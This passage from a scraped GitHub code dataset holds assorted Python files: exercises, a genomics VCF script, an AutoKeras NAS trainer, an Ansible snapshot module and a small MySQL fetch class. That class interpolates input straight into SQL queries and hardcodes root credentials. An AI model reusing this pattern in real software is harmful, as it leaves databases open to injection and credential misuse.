int(a)\nb = int(b)\nc = int(c)\n\nif a>b and a>c and b>c: # a>b>c\n maior = a\n medio = b\n menor = c\nelif a>b and a>c and c>b: # a>c>b \n maior = a\n medio = c\n menor = b\nelif b>a and b>c and a>c: # b>a>c \n maior = b\n medio = a\n menor = c\nelif b>c and b>a and c>a: # b>c>a \n maior = b\n medio = c\n menor = a\nelif c>a and c>b and a>b: # c>a>b \n maior = c\n medio = a\n menor = b\nelse: # c>b>a \n maior = c\n medio = b\n menor = a\n\nprint('{}\\n{}\\n{}\\n\\n{}\\n{}\\n{}' .format(menor, medio, maior, a, b, c))","repo_name":"gabrielleandro0801/beecrowd-exercises","sub_path":"Python/1042.py","file_name":"1042.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36225836206","text":"import os\nimport argparse\nimport gzip\n\n# create variables that can be entered in the command line\nparser = argparse.ArgumentParser()\nparser.add_argument('-v', type=str, metavar='vcf_path', required=True, help='path to vcfs')\nparser.add_argument('-w', type=str, metavar='Window_Size', required=True, help='size of scaffold window')\nparser.add_argument('-dp', type=int, metavar='min_depth', required=True, help='minimum genotype depth to be considered non-missing')\nparser.add_argument('-o', type=str, metavar='output_path', required=True, help='full path of output file')\nparser.add_argument('-gz', type=str, metavar='gzipped?', required=True, help='are vcfs gzipped (true) or not (false)')\n\n\nargs = parser.parse_args()\n\nif args.v.endswith(\"/\") is False:\n args.v += \"/\"\nvcf_list = []\n\nfor file in os.listdir(args.v): # get names of vcf files in args.v directory\n if args.gz == 'true':\n if file[-3:] == '.gz':\n vcf_list.append(file)\n file.split(\".\")[-2]\n elif args.gz == 'false':\n if file[-3:] == 'vcf':\n vcf_list.append(file)\n\n else:\n print('use \"true\" or \"false\" for -gz')\n\n\n\nout1 = open(args.o, 'w')\nout1.write(\"scaff\\tstart\\tend\\tnumSites\\tmissing\\n\")\nfor iii, vcf in enumerate(vcf_list):\n if args.gz == 'true':\n src = gzip.open(args.v + vcf)\n elif args.gz == 'false':\n src = open(args.v + vcf)\n M = 0.0\n tot_count = 0\n site_count = 0\n start = 0\n end = int(args.w)\n window_size = int(args.w)\n # evaluate contents of each line of input file\n for line_idx, line in enumerate(src): # Cycle over lines in the VCF file\n cols = line.replace('\\n', '').split('\\t') # Split each line of vcf\n if line_idx % 10000 == 0:\n print(line_idx)\n if len(cols) < 2: # This should be info just before header\n pass\n elif cols[0] == \"#CHROM\": # This should be header\n pass\n else:\n genos = []\n scaff = cols[0] # parse important info from each line\n pos = int(cols[1])\n info = cols[7].split(\";\")\n AN = float(info[2].split(\"=\")[1])\n AC = float(info[0].split(\"=\")[1])\n num_missing = 0\n num_ind = float(len(cols[9:]))\n m = 0.0\n if pos > start and pos <= end:\n site_count += 1\n for ind in cols[9:]:\n ind = ind.split(\":\")\n geno = ind[0].split(\"/\")\n if geno[0] == \".\":\n m += 1.0 / num_ind\n else:\n try:\n if int(ind[2]) < args.dp:\n m += 1.0 / num_ind\n except (IndexError, ValueError):\n pass\n M += m\n\n elif pos > end:\n M = M / float(site_count)\n out1.write(scaff + '\\t' +\n str(start) + '\\t' +\n str(end) + '\\t' +\n str(args.w) + '\\t' +\n str(site_count) + '\\t' +\n str(M) + '\\n')\n site_count = 0\n M = 0.0\n\n while pos > end:\n end += window_size\n start = end - window_size\n if pos > end:\n out1.write(scaff + '\\t' +\n str(start) + '\\t' +\n str(end) + '\\t' +\n str(args.w) + '\\t' +\n str(site_count) + '\\t' +\n str(-99) + '\\n')\n\n if int(pos) > start and int(pos) <= end:\n site_count += 1\n for ind in cols[9:]:\n ind = ind.split(\":\")\n geno = ind[0].split(\"/\")\n if geno[0] == \".\":\n m += 1.0 / num_ind\n else:\n try:\n if int(ind[2]) < args.dp:\n m += 1.0 / num_ind\n except (IndexError, ValueError):\n pass\n M += m\n\n\n out1.write(scaff + '\\t' +\n str(start) + '\\t' +\n str(end) + '\\t' +\n str(args.w) + '\\t' +\n str(site_count) + '\\t' +\n str(M) + '\\n')\n\n\nout1.close()\n","repo_name":"pmonnahan/ScanTools","sub_path":"MissingData.py","file_name":"MissingData.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"35103896225","text":"import mysql.connector\nmsc=[]\ndata=[]\n\nclass Conexion_fetchdata():\n def __init__(self):\n self.mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"iot\")\n\n def fetch(self, db_type, op_type, data_type):\n if(db_type == \"cons_reg\"):\n if(op_type == \"todos\" or op_type == \"all\"): query = \"SELECT * FROM reg\"\n else: query = \"SELECT * FROM reg WHERE nombre ='%s'\"%(data_type)\n else:\n if(op_type == \"todos\" or op_type == \"all\"): query = \"SELECT * FROM roc\"\n else: query = \"SELECT * FROM roc WHERE nombre ='%s'\"%(data_type)\n\n msc.clear()\n data.clear()\n\n mycursor = self.mydb.cursor()\n mycursor.execute(query)\n myresult = mycursor.fetchall()\n for i in range(0,len(myresult)):\n for z in range(0,len(myresult[0])):\n msc.append(str(myresult[i][z]).replace(\" \",\"_\"))\n \n data.insert(i, msc.copy())\n msc.clear()\n return data\n\n\n","repo_name":"b1ack0u7/IOT","sub_path":"Scripts/sql/sql_conexion.py","file_name":"sql_conexion.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13890897923","text":"# The task you have to perform is “Foods and Calories.” This task consists of a total of 15 points to evaluate your performance.\n\n# Problem Statement:-\n# You visited a restaurant called CodeWithHarry, and the food items in that restaurant are sorted, based on their amount of calories. You have to reserve this list of food items containing calories.\n\n# You have to use the following three methods to reserve a list:\n\n# Inbuild method of python\n# List name [::-1] slicing trick\n# Swap the first element with the last one and second element with second last one and so on like,\n# [6 7 8 34 5] -> [5 34 8 7 6]\n\n# Input:\n# Take a list as an input from the user\n\n# [5, 4, 1]\n\n# Output:\n# [1, 4, 5]\n\n# [1, 4, 5]\n\n# [1, 4, 5]\n\n# All three methods give the same results!\ns = input(\"sir please enter you set of values: \")\ns = s.replace(\",\",\" \")\ns =s.split()\nlist2 = s.copy()\ni = 0\nfor j in range(len(list2)-1,0,-1):\n list2[j] = s[i]\n i+=1\nlist2[0] = s[i]\nprint(list2)\n# using list slicing in python\nsp = s[::-1]\nprint(sp)\n# using reverse module in python\ns.reverse()\nprint(s)","repo_name":"rajesh604/python","sub_path":"practice_problems/practice_problem_2.py","file_name":"practice_problem_2.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"71884931392","text":"def get_type_test(type1, type2, type3, type4):\n code = \"\"\n code += \"E\" if type4 > 0 else \"I\"\n code += \"N\" if type3 > 0 else \"S\"\n code += \"T\" if type2 > 0 else \"F\"\n code += \"P\" if type1 > 0 else \"J\"\n desc4 = [\"Steady\", \"Fluid\"]\n desc3 = [\"Cool-head\", \"Warm-heart\"]\n desc2 = [\"Efficient\", \"Creative\"]\n desc1 = [\"Multiplayer\", \"Singleplayer\"]\n descKR4 = [\"꾸준하며\", \"유연하며\"]\n descKR3 = [\"냉철한 이성의\", \"따뜻한 마음씨의\"]\n descKR2 = [\"효율적인\", \"창의적인\"]\n descKR1 = [\"협동가\", \"자립가\"]\n \n gbti_dict = {\n \"ENFJ\":{\"code\":\"ENFJ\", \"nickname\":\"Twilight\", \"nicknameKR\":\"해 질 녘\", \"desc\":\" \".join([desc4[0], desc3[1], desc2[1], desc1[0]]), \"descKR\":\" \".join([descKR4[0], descKR3[1], descKR2[1], descKR1[0]])},\n \"INTJ\":{\"code\":\"INTJ\", \"nickname\":\"Deep Ocean\", \"nicknameKR\":\"심해\", \"desc\":\" \".join([desc4[0], desc3[0], desc2[1], desc1[1]]), \"descKR\":\" \".join([descKR4[0], descKR3[0], descKR2[1], descKR1[1]])},\n \"ESFJ\":{\"code\":\"ESFJ\", \"nickname\":\"Morning Dew\", \"nicknameKR\":\"아침 이슬\", \"desc\":\" \".join([desc4[0], desc3[1], desc2[0], desc1[0]]), \"descKR\":\" \".join([descKR4[0], descKR3[1], descKR2[0], descKR1[0]])},\n \"ISTJ\":{\"code\":\"ISTJ\", \"nickname\":\"Fog City\", \"nicknameKR\":\"안개 도시\", \"desc\":\" \".join([desc4[0], desc3[0], desc2[0], desc1[1]]), \"descKR\":\" \".join([descKR4[0], descKR3[0], descKR2[0], descKR1[1]])},\n \"ISTP\":{\"code\":\"ISTP\", \"nickname\":\"Summer Shower\", \"nicknameKR\":\"소나기\", \"desc\":\" \".join([desc4[1], desc3[0], desc2[0], desc1[1]]), \"descKR\":\" \".join([descKR4[1], descKR3[0], descKR2[0], descKR1[1]])},\n \"INFP\":{\"code\":\"INFP\", \"nickname\":\"Snowflake\", \"nicknameKR\":\"눈송이\", \"desc\":\" \".join([desc4[1], desc3[1], desc2[1], desc1[1]]), \"descKR\":\" \".join([descKR4[1], descKR3[1], descKR2[1], descKR1[1]])},\n \"ENFP\":{\"code\":\"ENFP\", \"nickname\":\"Rainbow Cloud\", \"nicknameKR\":\"무지개 구름\", \"desc\":\" \".join([desc4[1], desc3[1], desc2[1], desc1[0]]), \"descKR\":\" \".join([descKR4[1], descKR3[1], descKR2[1], descKR1[0]])},\n \"ISFJ\":{\"code\":\"ISFJ\", \"nickname\":\"Salt Lake\", \"nicknameKR\":\"염수호\", \"desc\":\" \".join([desc4[0], desc3[1], desc2[0], desc1[1]]), \"descKR\":\" \".join([descKR4[0], descKR3[1], descKR2[0], descKR1[1]])},\n \"INFJ\":{\"code\":\"INFJ\", \"nickname\":\"Moonlight\", \"nicknameKR\":\"달빛\", \"desc\":\" \".join([desc4[0], desc3[1], desc2[1], desc1[1]]), \"descKR\":\" \".join([descKR4[0], descKR3[1], descKR2[1], descKR1[1]])},\n \"ESFP\":{\"code\":\"ESFP\", \"nickname\":\"Spring Breeze\", \"nicknameKR\":\"봄바람\", \"desc\":\" \".join([desc4[1], desc3[1], desc2[0], desc1[0]]), \"descKR\":\" \".join([descKR4[1], descKR3[1], descKR2[0], descKR1[0]])},\n \"ISFP\":{\"code\":\"ISFP\", \"nickname\":\"Cherry Blossom\", \"nicknameKR\":\"벚꽃\", \"desc\":\" \".join([desc4[1], desc3[1], desc2[0], desc1[1]]), \"descKR\":\" \".join([descKR4[1], descKR3[1], descKR2[0], descKR1[1]])},\n \"ENTJ\":{\"code\":\"ENTJ\", \"nickname\":\"Dawn Breathe\", \"nicknameKR\":\"새벽 숨\", \"desc\":\" \".join([desc4[0], desc3[0], desc2[1], desc1[0]]), \"descKR\":\" \".join([descKR4[0], descKR3[0], descKR2[1], descKR1[0]])},\n \"INTP\":{\"code\":\"INTP\", \"nickname\":\"Blue Hour\", \"nicknameKR\":\"여명 빛\", \"desc\":\" \".join([desc4[1], desc3[0], desc2[1], desc1[1]]), \"descKR\":\" \".join([descKR4[1], descKR3[0], descKR2[1], descKR1[1]])},\n \"ESTJ\":{\"code\":\"ESTJ\", \"nickname\":\"Dune Line\", \"nicknameKR\":\"사구선\", \"desc\":\" \".join([desc4[0], desc3[0], desc2[0], desc1[0]]), \"descKR\":\" \".join([descKR4[0], descKR3[0], descKR2[0], descKR1[0]])},\n \"ESTP\":{\"code\":\"ESTP\", \"nickname\":\"Lightning Flash\", \"nicknameKR\":\"번개 섬광\", \"desc\":\" \".join([desc4[1], desc3[0], desc2[0], desc1[0]]), \"descKR\":\" \".join([descKR4[1], descKR3[0], descKR2[0], descKR1[0]])},\n \"ENTP\":{\"code\":\"ENTP\", \"nickname\":\"Blinking Star\", \"nicknameKR\":\"깜박이별\", \"desc\":\" \".join([desc4[1], desc3[0], desc2[1], desc1[0]]), \"descKR\":\" \".join([descKR4[1], descKR3[0], descKR2[1], descKR1[0]])},\n }\n gbti_combi_dict = {\n \"ENFJ\":{\"pos\":[\"INFP\"], \"neg\":[\"ISTJ\"]},\n \"INTJ\":{\"pos\":[\"ENTP\"], \"neg\":[\"ESFJ\"]},\n \"ESFJ\":{\"pos\":[\"ISFP\"], \"neg\":[\"INTJ\"]},\n \"ISTJ\":{\"pos\":[\"ESTP\"], \"neg\":[\"ENFJ\"]},\n \"ISTP\":{\"pos\":[\"ESTJ\"], \"neg\":[\"ENFP\"]},\n \"INFP\":{\"pos\":[\"ENFJ\"], \"neg\":[\"ESTP\"]},\n \"ENFP\":{\"pos\":[\"INFJ\"], \"neg\":[\"ISTP\"]},\n \"ISFJ\":{\"pos\":[\"ESFP\"], \"neg\":[\"ENTJ\"]},\n \"INFJ\":{\"pos\":[\"ENFP\"], \"neg\":[\"ESTJ\"]},\n \"ESFP\":{\"pos\":[\"ISFJ\"], \"neg\":[\"INTP\"]},\n \"ISFP\":{\"pos\":[\"ESFJ\"], \"neg\":[\"ENTP\"]},\n \"ENTJ\":{\"pos\":[\"INTP\"], \"neg\":[\"ISFJ\"]},\n \"INTP\":{\"pos\":[\"ENTJ\"], \"neg\":[\"ESFP\"]},\n \"ESTJ\":{\"pos\":[\"ISTP\"], \"neg\":[\"INFJ\"]},\n \"ESTP\":{\"pos\":[\"ISTJ\"], \"neg\":[\"INFP\"]},\n \"ENTP\":{\"pos\":[\"INTJ\"], \"neg\":[\"ISFP\"]},\n }\n gbti_dict[code][\"pos\"] = [gbti_dict[pos_code] for pos_code in gbti_combi_dict[code][\"pos\"]]\n gbti_dict[code][\"neg\"] = [gbti_dict[neg_code] for neg_code in gbti_combi_dict[code][\"neg\"]]\n return gbti_dict[code]\n\ndef get_type_analysis(type_list):\n icon = {\n \"icon0\":[\"bi-sun-fill\", \"bi-moon-fill\"],\n \"icon1\":[\"bi-lightning-fill\", \"bi-tree-fill\", \"bi-fire\"],\n \"icon2\":[\"bi-people-fill\", \"bi-person-fill\"]\n }\n msg = {\n \"msg0\":[\"Sunflower\", \"Night Owl\"],\n \"msg1\":[\"Initiator\", \"Evergreen\", \"Burning\"],\n \"msg2\":[\"Together\", \"Independent\"]\n }\n msgKR = {\n \"msgKR0\":[\"주로 낮에 활동합니다.\", \"주로 밤에 활동합니다.\"],\n \"msgKR1\":[\"프로젝트 초반에 주로 활약합니다.\", \"프로젝트에 전반적으로 활약합니다.\", \"프로젝트 후반에 주로 활약합니다.\"],\n \"msgKR2\":[\"함께 작업하는 편입니다.\", \"혼자서 작업하는 편입니다.\"]\n }\n \n result, resultKR, result_icon = [], [], []\n def split_type(k, n, crtr=[0]):\n if n == 2:\n if type_list[int(k)] < crtr[0]:\n result.append(msg[\"msg\"+k][0])\n resultKR.append(msgKR[\"msgKR\"+k][0])\n result_icon.append(icon[\"icon\"+k][0])\n else:\n result.append(msg[\"msg\"+k][1])\n resultKR.append(msgKR[\"msgKR\"+k][1])\n result_icon.append(icon[\"icon\"+k][1])\n elif n == 3:\n if type_list[int(k)] < crtr[0]:\n result.append(msg[\"msg\"+k][0])\n resultKR.append(msgKR[\"msgKR\"+k][0])\n result_icon.append(icon[\"icon\"+k][0])\n elif type_list[int(k)] < crtr[1]:\n result.append(msg[\"msg\"+k][1])\n resultKR.append(msgKR[\"msgKR\"+k][1])\n result_icon.append(icon[\"icon\"+k][1])\n else:\n result.append(msg[\"msg\"+k][2])\n resultKR.append(msgKR[\"msgKR\"+k][2])\n result_icon.append(icon[\"icon\"+k][2])\n \n split_type(\"0\", 2, [0])\n split_type(\"1\", 3, [-0.4, 0.4])\n split_type(\"2\", 2, [0])\n \n return result, resultKR, result_icon\n","repo_name":"SKKU-OSP/SKKU-OSP","sub_path":"osp/user/templatetags/gbti.py","file_name":"gbti.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"24671608163","text":"import glob\nimport os\nimport shutil\n\nimport autokeras as ak\nimport numpy as np\nimport tensorflow as tf\n\nfrom callbacks import create_callbacks\nfrom layers import MSEWeighted\nfrom networks import NAS_automodel as model\n\n\nclass Trainer:\n def __init__(\n self,\n save_model_path,\n auto_model_params,\n update_params,\n nas_params,\n network_name,\n fit_params,\n options=None,\n ):\n\n self.network_name = network_name\n self.save_model_path = save_model_path\n\n self.auto_model_params = auto_model_params\n self.nas_params = nas_params\n self.update_params = update_params\n self.options = options\n\n self.loss = MSEWeighted(loss_affine=self.options[\"loss_affine\"])\n self.compile_params = dict(\n optimizer=tf.keras.optimizers.Adam(learning_rate=1e-3),\n loss=self.loss,\n run_eagerly=False,\n )\n self.fit_params = fit_params\n\n def train(self, x_train, y_train, x_val, y_val):\n \"\"\"Setup NAS graph and train NAS\"\"\"\n\n assert self.network_name in [\n \"prosub\",\n \"sardunet-nas\",\n ], \"choose in {prosub|sardunet-nas}\"\n graph_inputs_outputs = model(\n loss=self.loss,\n **self.nas_params,\n )\n\n auto_model = ak.AutoModel(**graph_inputs_outputs, **self.auto_model_params)\n callbacks = create_callbacks(**self.update_params)\n\n _ = auto_model.fit(\n **self.fit_params,\n x=x_train,\n y=y_train,\n validation_data=(x_val, y_val),\n callbacks=callbacks,\n )\n\n print(\"End of main NAS training\")\n\n def clean_up_trials(self, save_model_path):\n trials = glob.glob(save_model_path + \"/trial_*\")\n for trial_dir in trials:\n print(\"Removing {}\".format(trial_dir))\n shutil.rmtree(trial_dir)\n\n def load_predictor(self, postfix=\"last_model\", model=None, model_print=False):\n # https://stackoverflow.com/questions/52800025/keras-give-input-to-intermediate-layer-and-get-final-output\n if model is None:\n print(\"Total model loaded from',save_model_path\")\n if model_print:\n print(model.summary())\n save_model_path = os.path.join(self.save_model_path, postfix)\n model = tf.keras.models.load_model(\n save_model_path, custom_objects=ak.CUSTOM_OBJECTS, compile=False\n )\n\n m = model.get_layer(\"downsampling_mult_layer\").get_weights()[0]\n sigma_bar = model.get_layer(\"downsampling_mult_layer\").get_weights()[2]\n\n # Identify input index for predictor/reconstruction network\n S_end_layer = model.get_layer(\"DownsamplingOp\")\n for idx, layer in enumerate(model.layers):\n if layer.name == S_end_layer.name:\n idx_in = idx + 1 # next one goes to the predictor input\n input_shape = model.layers[0].get_input_shape_at(0)\n\n # Build predictor/reconstruction network\n new_input = tf.keras.Input(shape=input_shape[1:])\n x = new_input\n for layer in model.layers[idx_in:]:\n x = layer(x)\n P_model = tf.keras.Model(inputs=new_input, outputs=x)\n if model_print:\n print(\"Predictor model\", P_model.summary())\n\n return P_model, m, sigma_bar\n\n def evaluate(\n self,\n x_test,\n y_test,\n model=None,\n save_prediction=False,\n save_result=False,\n save_result_common=False,\n ):\n\n P_model, m, sigma_final = self.load_predictor(postfix=\"last_model\", model=model)\n\n # Could also load sigma_final, m from saved dir (previous version)\n print(\"Number of nonzero-measurements (check):\", np.sum(m != 0))\n x_test = sigma_final * m * x_test\n\n # prediction on test set\n y_pred = P_model.predict(\n x_test, batch_size=self.options[\"batch_size\"], verbose=2\n )\n loss = np.mean(self.loss(y_test, y_pred))\n if save_prediction:\n np.save(os.path.join(self.save_model_path, \"test_pred.npy\"), y_pred)\n if save_result:\n np.savetxt(os.path.join(self.save_model_path, \"test_result.txt\"), [loss])\n if save_result_common:\n os.makedirs(\n os.path.join(self.options[\"out_base\"], \"results\"), exist_ok=True\n )\n save_file = os.path.join(\n self.options[\"out_base\"], \"results\", self.options[\"proj_name\"] + \".npy\"\n )\n if os.path.exists(save_file):\n print(\"overwriting saved result\", save_file)\n print(\"Saving test result:\", save_file)\n np.save(save_file, loss)\n\n return loss\n","repo_name":"sbb-gh/PROSUB","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27610298741","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'NTT Ltd.'\n}\nDOCUMENTATION = '''\n---\nmodule: snapshot\nshort_description: Initiate, update or delete a manual snapshot on a server\ndescription:\n - Initiate a manual snapshot on a server\nversion_added: \"2.10.0\"\nauthor:\n - Ken Sinfield (@kensinfield)\noptions:\n auth:\n description:\n - Optional dictionary containing the authentication and API information for Cloud Control\n required: false\n type: dict\n suboptions:\n username:\n description:\n - The Cloud Control API username\n required: false\n type: str\n password:\n description:\n - The Cloud Control API user password\n required: false\n type: str\n api:\n description:\n - The Cloud Control API endpoint e.g. api-na.mcp-services.net\n required: false\n type: str\n api_version:\n description:\n - The Cloud Control API version e.g. 2.11\n required: false\n type: str\n region:\n description:\n - The geographical region\n required: false\n type: str\n default: na\n datacenter:\n description:\n - The datacenter name\n required: false\n type: str\n network_domain:\n description:\n - The name of a Cloud Network Domain\n required: false\n type: str\n server:\n description:\n - The name of a server to enable Snapshots on\n required: false\n type: str\n server_id:\n description:\n - The UUID of a server to enable Snapshots on\n required: false\n type: str\n id:\n description:\n - The UUID of the snapshot to delete\n required: false\n type: str\n description:\n description:\n - Optional description for the manual snapshot\n required: false\n type: str\n state:\n description:\n - The action to be performed\n required: false\n type: str\n default: present\n choices:\n - present\n - absent\nnotes:\n - Requires NTT Ltd. MCP account/credentials\nrequirements:\n - requests\n - configparser\n - pyOpenSSL\n - netaddr\n'''\n\nEXAMPLES = '''\n- hosts: 127.0.0.1\n connection: local\n collections:\n - nttmcp.mcp\n tasks:\n\n - name: Initiate a manual snapshot\n snapshot_info:\n region: na\n datacenter: NA9\n server: myServer\n description: A random snapshot\n\n - name: Update the metadata on a manual snapshot\n snapshot_info:\n region: na\n id: 112b7faa-ffff-ffff-ffff-dc273085cbe4\n description: A random snapshot description\n\n - name: Delete a manual snapshot\n snapshot_info:\n region: na\n id: 112b7faa-ffff-ffff-ffff-dc273085cbe4\n state: absent\n'''\nRETURN = '''\ndata:\n description: Manual snapshot UUID\n returned: success\n type: str\n sample: 112b7faa-ffff-ffff-ffff-dc273085cbe4\nmsg:\n description: Message\n returned: fail\n type: str\n sample: Could not ascertain the status of the snapshot deletion. Check manually\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.nttmcp.mcp.plugins.module_utils.utils import get_credentials, get_regions\nfrom ansible_collections.nttmcp.mcp.plugins.module_utils.provider import NTTMCPClient, NTTMCPAPIException\n\n\ndef main():\n \"\"\"\n Main function\n :returns: Initiate a Snapshot\n \"\"\"\n module = AnsibleModule(\n argument_spec=dict(\n auth=dict(type='dict'),\n region=dict(default='na', type='str'),\n datacenter=dict(required=False, type='str'),\n network_domain=dict(required=False, default=None, type='str'),\n server=dict(required=False, default=None, type='str'),\n server_id=dict(required=False, default=None, type='str'),\n description=dict(required=False, default=None, type='str'),\n id=dict(required=False, default=None, type='str'),\n state=dict(default='present', choices=['present', 'absent'])\n ),\n supports_check_mode=True\n )\n state = module.params.get('state')\n result = None\n server = {}\n network_domain_name = module.params.get('network_domain')\n datacenter = module.params.get('datacenter')\n server_name = module.params.get('server')\n server_id = module.params.get('server_id')\n\n try:\n credentials = get_credentials(module)\n except ImportError as e:\n module.fail_json(msg='{0}'.format(e))\n\n # Check the region supplied is valid\n regions = get_regions()\n if module.params.get('region') not in regions:\n module.fail_json(msg='Invalid region. Regions must be one of {0}'.format(regions))\n\n if credentials is False:\n module.fail_json(msg='Could not load the user credentials')\n\n try:\n client = NTTMCPClient(credentials, module.params.get('region'))\n except NTTMCPAPIException as e:\n module.fail_json(msg=e.msg)\n\n try:\n if state == 'present':\n if module.params.get('id') and module.params.get('description'):\n if module.check_mode:\n module.exit_json(msg='The snapshot {0} will be updated with the descriprition: {1}'.format(\n module.params.get('id'),\n module.params.get('description')\n ))\n # If there is an ID and a description assume an update to the snapshot metadata\n if client.update_snapshot(module.params.get('id'), module.params.get('description')):\n result = module.params.get('id')\n else:\n # Get the CND\n try:\n network = client.get_network_domain_by_name(name=network_domain_name, datacenter=datacenter)\n network_domain_id = network.get('id')\n except (KeyError, IndexError, AttributeError, NTTMCPAPIException) as e:\n module.fail_json(msg='Could not find the Cloud Network Domain: {0}'.format(e))\n\n # Check if the Server exists based on the supplied name\n try:\n if server_name is None and server_id is None:\n module.fail_json(msg='A server valid value for server or server_id is required')\n if server_id:\n server = client.get_server_by_id(server_id=server_id)\n else:\n server = client.get_server_by_name(datacenter=datacenter,\n network_domain_id=network_domain_id,\n name=server_name)\n if not server.get('id'):\n raise NTTMCPAPIException('No server found for {0}'.format(server_name or server_id))\n except (KeyError, IndexError, AttributeError, NTTMCPAPIException) as e:\n module.fail_json(msg='Could not locate any existing server - {0}'.format(e))\n\n if module.check_mode:\n if server.get('snapshotService'):\n module.exit_json(msg='A Snapshot will be taken for server ID: {0}'.format(server.get('id')))\n else:\n module.warn(warning='Snapshots are not enabled for server ID: {0}'.format(server.get('id')))\n module.exit_json(msg='No Snapshot can be taken')\n\n # Take the snapshot\n result = client.manual_snapshot(server.get('id'), module.params.get('description'))\n\n if result:\n module.exit_json(changed=True, data=result)\n module.fail_json(msg='Could not ascertain the status of the manual snapshot. Check manually')\n elif state == 'absent':\n if module.params.get('id') is None:\n module.fail_json(msg='Argument \"id\" is required when deleting a manual snapshot')\n if module.check_mode:\n module.exit_json(msg='Snapshot with ID {0} will be deleted'.format(module.params.get('id')))\n if client.delete_snapshot(module.params.get('id')):\n module.exit_json(changed=True, msg='The manual snapshot was successfully deleted')\n module.fail_json(msg='Could not ascertain the status of the snapshot deletion. Check manually')\n\n except (KeyError, IndexError, AttributeError, NTTMCPAPIException) as e:\n module.fail_json(msg='Could not initiate a manual Snapshot: {0}'.format(e))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nttmcp/mcp_ansible_collection","sub_path":"plugins/modules/snapshot.py","file_name":"snapshot.py","file_ext":"py","file_size_in_byte":8984,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"4293228096","text":"def kouyaku(a: int, b: int) -> int:\n\n if b == 0:\n return a\n else:\n return kouyaku(b, a % b)\n\n\nN = int(input())\n\nts = []\nfor _ in range(N):\n ts.append(int(input()))\n\nans = 1\nfor t in ts:\n ans = ans * t // kouyaku(ans, t)\n\nprint(ans)\n","repo_name":"murakami10/atc_python","sub_path":"not_solved/re_solve/03/abc70_c.py","file_name":"abc70_c.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21358399728","text":"from collections import deque # fifo, lilo 모두 구현 가능. list 보다 빠르게 설계\r\nimport sys\r\n\r\ninput = sys.stdin.readline\r\n\r\ndef solution():\r\n for _ in range(int(input())):\r\n N, M = map(int, input().split())\r\n rank_lst = list(map(int, input().split())) # 중요도 리스트\r\n rank_tup = deque([(rank, idx) for idx, rank in enumerate(rank_lst)]) # (중요도, 인덱스) 큐\r\n\r\n count = 0 # 출력 번호\r\n while True:\r\n maxTuple = max(rank_tup, key= lambda x:x[0]) # 최대 rank(중요도) 포함 튜플 \r\n if rank_tup[0][0] == maxTuple[0]: # 첫 원소의 우선순위가 최대라면\r\n if rank_tup[0][1] == M: # 최대값 인덱스가 맨 첫 원소 인덱스와 같다면 \r\n count += 1\r\n break\r\n else: \r\n rank_tup.popleft()\r\n count += 1\r\n else:\r\n rank_tup.append(rank_tup.popleft())\r\n print(count)\r\n \r\nsolution()","repo_name":"Yeonny0723/TIL_algorithm","sub_path":"백준/Silver/1966. 프린터 큐/프린터 큐.py","file_name":"프린터 큐.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37887134311","text":"import numpy as np \n\n\ndef f(x):\n y=x**3-7*x**2+14*x-6\n return y \n\n\n\ndef bissec(a,b,erro):\n #calculando número de iterações \n n=(np.log(b-a)- np.log(erro))/np.log(2)\n #funcão ceil pega proximo número inteiro\n n=np.ceil(n)\n i=0\n print(\"=\"*40)\n print(\"Valor das iterações\")\n print(\"=\"*40)\n while i 0: \n print(\"Não podemos afirmar se há raizes nesse intervalo\")\n else:\n # Criar um ponto medio m=a+b/2\n m=(a+b)/2\n m=round(m,6)\n if f(a)*f(m)<0:\n b=m\n else:\n a=m\n print(f'Valor de x_{i+1} = {m}')\n i+=1\n print()\n return print(f'O valor aproximado da raiz é:{m}')\n\nbissec(0,1,0.01)","repo_name":"YuriMenezesIF/UFS-programacao","sub_path":"python/Calculo Numerico/metodoBisseccao.py","file_name":"metodoBisseccao.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13713207377","text":"import json\n\n\ndef process_user(data: dict, _user):\n if 'user' in data:\n _user.put(json.dumps(data['user']))\n data.pop('user')\n\n for val in data.values():\n if isinstance(val, list):\n for element in val:\n if isinstance(element, dict):\n process_user(element, _user)\n\n\ndef parse(response, data_holder,logger):\n body = response.text\n\n if len(body) < 13_000:\n # if the size of data is too small that mean it has no been updated\n # the default empty size seems to be 640\n # so I decide 12434 could be a good value in case of small change due to build tag\n logger.warning(f\"EMPTY - {response.url}\")\n return\n\n raw_json = body.split('')[0]\n data = json.loads(raw_json)['props']['initialState']['question']\n\n process_user(data, data_holder['users'])\n data_holder['questions'].put(json.dumps(data))\n\n logger.info(f\"SUCCESS - {response.url}\")\n return\n","repo_name":"sunfoxy2k/Distributed-Crawler","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37149426025","text":"import pygame\nimport 